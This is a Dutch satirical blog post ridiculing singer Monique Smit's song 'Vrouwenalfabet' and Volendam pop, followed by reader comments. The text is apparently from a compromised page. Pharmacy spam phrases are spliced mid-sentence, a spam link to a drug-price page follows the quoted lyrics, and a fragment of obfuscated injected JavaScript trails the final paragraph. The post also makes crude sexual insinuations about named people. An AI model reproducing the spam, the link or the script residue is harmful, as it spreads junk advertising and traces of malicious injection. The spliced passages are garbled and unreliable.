Monique zegt hoe het moet

Monique Smit, wonderkind

Monique Smit, wonderkind

Ik had gehoopt dat we met het nummer Te Jong (‘Je mag dan wel een meisje zijn. Maar in plaats van breezer drink je droge witte wijn‘) van het schaamteloze duo Nick & Simon wel de bodem hadden bereikt van de Volendamse semiwijshedenbeerput. Maar niets is minder waar. De tweede generatie Palingzangers- en zangeressen blijft ons bestoken met filosofische ramsj.

Deze keer is het Monique Smit die – middels haar single Generic zyban no prescription How much risperdal can kill you Vrouwenalfabet – ons een lesje leert. Ik mag graag naar Monique kijken als ze de Kids Top 20 presenteert. Zichtbaar ongemakkelijk danst ze daar wekelijks tussen kinderen van een jaar of 9, terwijl ze ondertussen clipjes van broerlief, Chipz en Kinderen voor Kinderen aankondigt. Hartstikke leuk, want Moon kan ook nog eens niet zo heel goed presenteren. En ook als ze in d’r ondergoed in een mannenblad staat is Monique Smit eigenlijk best te hachelen.

Maar ja:

hou je deuren open
en je handen thuis
geef haar complimentjes
breng haar veilig naar huis
en wuif haar zorgen niet onnozel weg
http://socialevents.events/2018/02/11/fosamax-price-in-india/

Ik geloof het gewoon niet. En dat heeft niet eens te maken met het feit dat de tekst niet eens een alfabet is (‘de A is van aardppelen, die schilt ze voor je’). Maar Monique Smit gaat het liefst op vakantie naar Salou. En ik kan me niet aan de indruk onttrekken dat de mannen daar maar weinig deuren open houden. Behalve dan het deurtje van Monique zelf. En ik weiger al helemaal te geloven dat Jan Smit bij Yolanthe zijn handen thuis heeft gehouden.

Volgende keer gewoon weer liedjes over de Zuiderzee, jongens. Kijk nog maar eens goed hoe die sympathieke Jan Keizer en Piet Veerman dat deden. fdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


1 ster2 sterren3 sterren4 sterren5 sterren
(nog geen stemmen)
Loading ... Loading ...
Link naar deze pagina
Maak favoriet
Mail ons!
<<< Ga terug

Over de auteur

Bekendheid kreeg hij met de presentatie van de AVRO's Wie-kent-kwis met de zogenaamde marmotten-race, waarbij het echter om cavia's ging. Hij werd verkozen tijdens het Conclaaf van april 2005 en is auteur van onder meer het boek: "Standing Firm: A Vice-Presidential Memoir".

3 Reacties op “Monique zegt hoe het moet”

  1. Ik vind het zo gĂȘnant als ze tussen die hordes bleue kinders over een kansloze onenightstand playbackt. Schijnt ze het ook nog eens te doen met nog zo’n jammerende witte hemelgeit.

    Hoog tijd dat Volendam weer eens uit de Eredivisie wordt geknikkerd…kon wel eens de enige manier te zijn om dat gespuis terug te pakken.

  2. Zalige vrouw is het toch, die Moon. Maar dat wisten we al: http://nl.youtube.com/watch?v=6LWn44vBhHw

  3. Nog zo’n ‘diepe’ tekst: http://nl.youtube.com/watch?v=QU3G8Tlfp-w

    Al denk ik dat het uiterlijk van de zangeres in kwestie een hoop verhult…

Laat een bericht achter